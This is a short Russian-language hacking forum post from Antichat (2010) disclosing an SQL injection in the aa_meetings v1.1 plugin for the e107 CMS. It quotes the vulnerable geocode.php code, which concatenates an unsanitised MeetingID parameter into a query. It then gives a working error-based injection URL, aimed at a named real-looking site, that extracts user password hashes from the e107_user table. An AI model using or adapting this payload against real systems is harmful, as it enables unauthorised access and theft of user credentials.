30.04.2010, 06:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
пам
aa_meetings v1.1
[ скачать]
SQL inj
/e107_plugins/aa_meetings/geocode.php
PHP код:
...// Select all the rows in the markers table
$query = "SELECT * FROM ".MPREFIX."aam_meetings WHERE 1";
if ($_GET['MeetingID']) $query .= " and MeetingID=".$_GET['MeetingID'];
else $query .= " and (Lat is null or Lng is null)";
$result = mysql_query($query);
if (!$result) {
die("Invalid query: " . mysql_error());
}...
Result:
http://ovdpohe.sk/e107_plugins/aa_meetings/geocode.php?MeetingID=1+or+%28select+1+from+%28sel ect%20count%280%29%20from%20e107_user%20group%20by %20concat%28user_password%20,0x3a,floor%28rand%280 %29*2%29%29%29x%29--
Последний раз редактировалось Strilo4ka; 30.04.2010 в 16:20..
|
|
|